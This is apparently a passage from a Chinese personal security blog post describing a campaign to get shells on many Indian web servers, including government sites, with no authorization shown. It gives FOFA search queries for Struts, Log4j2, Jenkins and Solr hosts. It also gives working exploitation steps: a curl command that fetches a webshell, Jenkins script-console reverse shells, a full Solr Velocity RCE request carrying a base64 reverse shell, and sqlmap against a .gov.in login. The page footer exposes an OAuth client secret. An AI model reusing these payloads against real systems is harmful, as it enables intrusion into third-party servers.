<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app=&quot;Struts&quot; &amp;&amp; host=&quot;in&quot; &amp;&amp; country=&quot;IN&quot; &amp;&amp; status_code=&quot;200&quot; &amp;&amp; (port=&quot;80&quot; || port=&quot;443&quot;)</span><br></pre></td></tr></table></figure>
<p><strong>Log4j2</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(app=&quot;Log4j2&quot; &amp;&amp; host=&quot;in&quot; &amp;&amp; country=&quot;IN&quot; &amp;&amp; status_code=&quot;200&quot; &amp;&amp; (port=&quot;80&quot; || port=&quot;443&quot;))</span><br></pre></td></tr></table></figure>
<p>其他的也都大同小异，照葫芦画瓢就行。</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025300355.png" alt="image-20230711025300355"></p>
<p>目标站点收集差不多了，就是漏洞探测阶段了。</p>
<h2 id="0x02-漏洞探测及利用"><a class="markdownIt-Anchor" href="#0x02-漏洞探测及利用"></a> 0x02、漏洞探测及利用</h2>
<h3 id="struts2"><a class="markdownIt-Anchor" href="#struts2"></a> Struts2：</h3>
<p>直接掏出大范围漏扫AWVS就行批量漏洞探测：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025640689.png" alt="image-20230711025640689"></p>
<p>第一天数据就直接起飞，因为本次目标是<mark>getshell</mark>直接忽略中低危漏洞告警，查看高危漏洞：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025838442.png" alt="image-20230711025838442"></p>
<p>很好一堆<mark>Struts2</mark>漏洞，直接上工具：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711030506931.png" alt="image-20230711030506931"></p>
<p>得到一个RCE（远程命令执行漏洞），远程写入<mark>shell</mark>，先利用工具生成一个<mark>Antsword(蚁剑)jsp格式的shell</mark></p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711030808818.png" alt="image-20230711030808818"></p>
<p>将shell放到一个公网服务器上，接着执行命令查看web路径：<code>/var/tomcat9/pmrportal/ROOT/</code></p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711031350331.png" alt="image-20230711031350331"></p>
<p>直接执行</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -o /var/tomcat9/pmrportal/ROOT/shell.jsp http://u_ip/antsword.jsp</span><br></pre></td></tr></table></figure>
<p>然后webshell工具Antsword连接即可：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711031634840.png" alt="image-20230711031634840"></p>
<p>爆出的该S2-045的漏洞的还有几个，getshell方式同上，不进行细述了___________________________________。</p>
<h3 id="weblogic"><a class="markdownIt-Anchor" href="#weblogic"></a> Weblogic：</h3>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230711025901659.png" alt="image-20230711025901659"></p>
<p>很好用的awvs，直接上工具注入内存马：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713175036472.png" alt="image-20230713175036472"></p>
<p>冰蝎连接webshell：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713175143564.png" alt="image-20230713175143564"></p>
<p>同类型的漏洞还有几个，getshell的方式都一致，不一一概述了》》</p>
<p>（PS：这个时候已经有些疲软了，没有去手测upload的点）</p>
<h3 id="jenkins"><a class="markdownIt-Anchor" href="#jenkins"></a> Jenkins：</h3>
<p>中途其他框架没有收获的时候，就去浏览知识的海洋了，看到一个存在大量未授权+RCE的框架漏洞（<strong>Jenkins</strong>），二话不说，直接上FOFA：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(app=&quot;JENKINS&quot; &amp;&amp; title==&quot;Dashboard [Jenkins]&quot; &amp;&amp; country=&quot;IN&quot; &amp;&amp; status_code=&quot;200&quot;) &amp;&amp; (port=&quot;80&quot; || port=&quot;443&quot;)</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713220128955.png" alt="image-20230713220128955"></p>
<p>一看86条资产，有戏，数量不多，直接手测：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713180849084.png" alt="image-20230713180849084"></p>
<p>存在未授权，访问manager --&gt; script页面，进行命令执行测试：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">println &quot;ls -al&quot;.execute().text</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713181156856.png" alt="image-20230713181156856"></p>
<p>存在命令执行，尝试反弹shell：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">println &quot;bash -i &gt;&amp; /dev/tcp/ip/port 0&lt;&amp;1&quot;.execute().text</span><br></pre></td></tr></table></figure>
<p>接收shell的服务器开启端口监听：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713181947756.png" alt="image-20230713181947756"></p>
<p>执行命令</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713181823099.png" alt="image-20230713181823099"></p>
<p>发现没有shell反弹过来，猜测不能在web端执行反弹shell，于是将反弹shell的命令写入.sh文件中，然后执行，进行反弹shell操作：</p>
<p>在sh文件中写入如下内容：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/ip/port 0&lt;&amp;1</span><br></pre></td></tr></table></figure>
<p>保存在开放的web端口，在jenkins服务中执行如下curl命令远程下载sh文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">println <span class="string">&quot;curl - o /tmp/jenkins.sh http://u_ip:port/jenkins.sh&quot;</span>.execute().text</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713182926953.png" alt="image-20230713182926953"></p>
<p>查看.sh文件是否获取成功：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">println &quot;ls -al /tmp&quot;.execute().text</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183110423.png" alt="image-20230713183110423"></p>
<p>获取.sh文件成功，执行文件，反弹shell：</p>
<p>开启监听：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183406307.png" alt="image-20230713183406307"></p>
<p>执行命令，启动.sh文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">println &quot;bash /tmp/jenkins.sh&quot;.execute().text</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183606528.png" alt="image-20230713183606528"></p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230713183513017.png" alt="image-20230713183513017"></p>
<p>成功监听到谈过来的shell，又拿下一台！其他的没有存在未授权，便没有尝试。</p>
<h3 id="apache-solr"><a class="markdownIt-Anchor" href="#apache-solr"></a> Apache-Solr</h3>
<p>闲着没事，打开文库看了几篇RCE复现，心血来潮，打开FOFA：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">country=<span class="string">&quot;IN&quot;</span> &amp;&amp; app=<span class="string">&quot;Apache-Solr&quot;</span> &amp;&amp; status_code=<span class="string">&quot;200&quot;</span> &amp;&amp; (port=<span class="string">&quot;443&quot;</span> || port=<span class="string">&quot;80&quot;</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719101927146.png" alt="image-20230719101927146"></p>
<p>数据不大，接着手测，拿到三个未授权(不需要登陆)：</p>
<p><mark>授权</mark>：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719102234003.png" alt="image-20230719102234003"></p>
<p><mark>未授权</mark>：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719102331665.png" alt="image-20230719102331665"></p>
<p>拿到未授权之后，进行CVE探测：</p>
<p>访问<code>/solr/admin/cores/</code>，获取<code>name =&gt; music</code></p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719102848788.png" alt="image-20230719102848788"></p>
<p>接着拼接路径<code>/solr/music/config/</code>查看用户配置信息：</p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719103210432.png" alt="image-20230719103210432"></p>
<p>都为<code>true</code>，可直接利用公网披露的payload进行RCE，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /solr/music/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set(<span class="variable">$x</span>=%27%27)+%23set(<span class="variable">$rt</span>=<span class="variable">$x</span>.class.forName(%27java.lang.Runtime%27))+%23set(<span class="variable">$chr</span>=<span class="variable">$x</span>.class.forName(%27java.lang.Character%27))+%23set(<span class="variable">$str</span>=<span class="variable">$x</span>.class.forName(%27java.lang.String%27))+%23set(<span class="variable">$ex</span>=<span class="variable">$rt</span>.getRuntime().<span class="built_in">exec</span>(%22whoami%22))+<span class="variable">$ex</span>.waitFor()+%23set(<span class="variable">$out</span>=<span class="variable">$ex</span>.getInputStream())+%23foreach(<span class="variable">$i</span>+<span class="keyword">in</span>+[1..<span class="variable">$out</span>.available()])<span class="variable">$str</span>.valueOf(<span class="variable">$chr</span>.toChars(<span class="variable">$out</span>.<span class="built_in">read</span>()))%23end HTTP/1.1</span><br><span class="line">Host: ip</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719115129111.png" alt="image-20230719115129111"></p>
<p>测试是否出网：</p>
<p>修改执行命令为</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl%20xtolsc.dnslog.cn</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719115425835.png" alt="image-20230719115425835"></p>
<p>可出网，直接反弹shell：</p>
<figure class="highlight xquery"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">GET /solr/music/select?q=<span class="number">1</span>&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=<span class="meta">%23set</span>(<span class="variable">$x</span>=<span class="meta">%27</span><span class="meta">%27</span>)+<span class="meta">%23set</span>(<span class="variable">$rt</span>=<span class="variable">$x</span>.class.forName(<span class="meta">%27java</span><span class="built_in">.lang</span>.Runtime<span class="meta">%27</span>))+<span class="meta">%23set</span>(<span class="variable">$chr</span>=<span class="variable">$x</span>.class.forName(<span class="meta">%27java</span><span class="built_in">.lang</span>.Character<span class="meta">%27</span>))+<span class="meta">%23set</span>(<span class="variable">$str</span>=<span class="variable">$x</span>.class.forName(<span class="meta">%27java</span><span class="built_in">.lang</span>.String<span class="meta">%27</span>))+<span class="meta">%23set</span>(<span class="variable">$ex</span>=<span class="variable">$rt</span>.getRuntime().exec(<span class="meta">%22bash</span><span class="meta">%20-c</span><span class="meta">%20</span><span class="meta">%7Becho</span><span class="meta">%2CYmFzaCAtaSA</span><span class="meta">%2BJiAvZGV2xxxxxx8xMDEuNDMuMTM5LjI0My81MDAwIDA</span><span class="meta">%2BJjE</span><span class="meta">%3D</span><span class="meta">%7D</span><span class="meta">%7C</span><span class="meta">%7Bbase64</span><span class="meta">%2C-d</span><span class="meta">%7D</span><span class="meta">%7C</span><span class="meta">%7Bbash</span><span class="meta">%2C-i</span><span class="meta">%7D</span><span class="meta">%22</span>))+<span class="variable">$ex</span>.waitFor()+<span class="meta">%23set</span>(<span class="variable">$out</span>=<span class="variable">$ex</span>.getInputStream())+<span class="meta">%23foreach</span>(<span class="variable">$i</span>+<span class="keyword">in</span>+[<span class="number">1</span>..<span class="variable">$out</span>.available()])<span class="variable">$str</span>.valueOf(<span class="variable">$chr</span>.toChars(<span class="variable">$out</span>.read()))<span class="meta">%23end</span>  HTTP/<span class="number">1.1</span></span><br><span class="line">Host: ip</span><br><span class="line">accept: */*</span><br><span class="line">User-Agent: Mozilla/<span class="number">5.0</span> (Windows NT <span class="number">10.0</span>; Win64; x64) AppleWebKit/<span class="number">537.36</span> (KHTML, like Gecko) Chrome/<span class="number">114.0</span>.<span class="number">0</span>.<span class="number">0</span> Safari/<span class="number">537.36</span></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=<span class="number">0</span>.<span class="number">9</span></span><br><span class="line">Connection: close</span><br></pre></td></tr></table></figure>
<p>VPS开启端口监听：<code>nc -lvvnp 5000</code></p>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230719115817964.png" alt="image-20230719115817964"></p>
<p>接听到弹过来的shell了，好，又拿下一台，root权限。</p>
<h3 id="其他漏洞发现"><a class="markdownIt-Anchor" href="#其他漏洞发现"></a> 其他漏洞发现</h3>
<h4 id="反射型xss"><a class="markdownIt-Anchor" href="#反射型xss"></a> 反射型XSS</h4>
<p>具体测试过程均无任何难度，无须bypass黑名单之类的，测试语句</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230726182631855.png" alt="image-20230726182631855"></p>
<h4 id="sql注入"><a class="markdownIt-Anchor" href="#sql注入"></a> SQL注入</h4>
<p>这类没有具体测试，发现注入点之后直接上SQLmap开扫：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap https://******.gov.in/****/Validate.jsp --data <span class="string">&quot;email=a@a.com&amp;password=123456&quot;</span> --random-agent -t 10 -p password --proxy=http://127.0.0.1:7890 --dbms=mysql</span><br></pre></td></tr></table></figure>
<p><img src="/2023/07/%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E9%98%BF%E4%B8%89%E7%9A%84%E7%BA%A2%E5%B8%BD%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-getshell/image-20230726183935140.png" alt="image-20230726183935140"></p>
<h2 id="渗透总结"><a class="markdownIt-Anchor" href="#渗透总结"></a> 渗透总结</h2>
<p>本次测试周期长，测试目标暴露点多，非常有趣的一次渗透实战，后期有其他事儿，就没法全身心投入，蛮可惜的。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/06/%E8%93%9D%E6%A1%A5%E6%9D%AFCTF-ezphp-Wirteup/" rel="prev" title="蓝桥杯CTF-ezphp-Wirteup">
                  <i class="fa fa-chevron-left"></i> 蓝桥杯CTF-ezphp-Wirteup
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/" rel="next" title="Responder与evil-winRM配合远程登录windows">
                  Responder与evil-winRM配合远程登录windows <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">TWe1v3</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">309k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">4:41</span>
  </span>
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

    </div>
  </footer>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/9.1.3/mermaid.min.js","integrity":"sha256-TIYL00Rhw/8WaoUhYTLX9SKIEFdXxg+yMWSLVUbhiLg="}}</script>
  <script src="/js/third-party/tags/mermaid.js"></script>



  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/katex.min.css" integrity="sha256-uik/hNqHWZldXh/0K35nqOSCff9F61/ZOFReqNOBgB0=" crossorigin="anonymous">
  <script class="next-config" data-name="katex" type="application/json">{"copy_tex_js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/contrib/copy-tex.min.js","integrity":"sha256-Us54+rSGDSTvIhKKUs4kygE2ipA0RXpWWh0/zLqw3bs="}}</script>
  <script src="/js/third-party/math/katex.js"></script>


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"TWe1v3# GitHub repo owner","repo":"TWe1v3-Blogcomment","client_id":"b1f12cb0fd210a7f001b# GitHub Application Client ID","client_secret":"80355aa1b174d1926079780262cdc80f1ca96516","admin_user":"TWe1v3","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":"zh-CN","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.min.js","integrity":"sha256-Pmj85ojLaPOWwRtlMJwmezB/Qg8BzvJp5eTzvXaYAfA="},"path_md5":"54a80cd6ee7d27eecf1f49d6da7f1ee4"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>


<script src="/live2d-widget/autoload.js"></script>
</body>
</html>
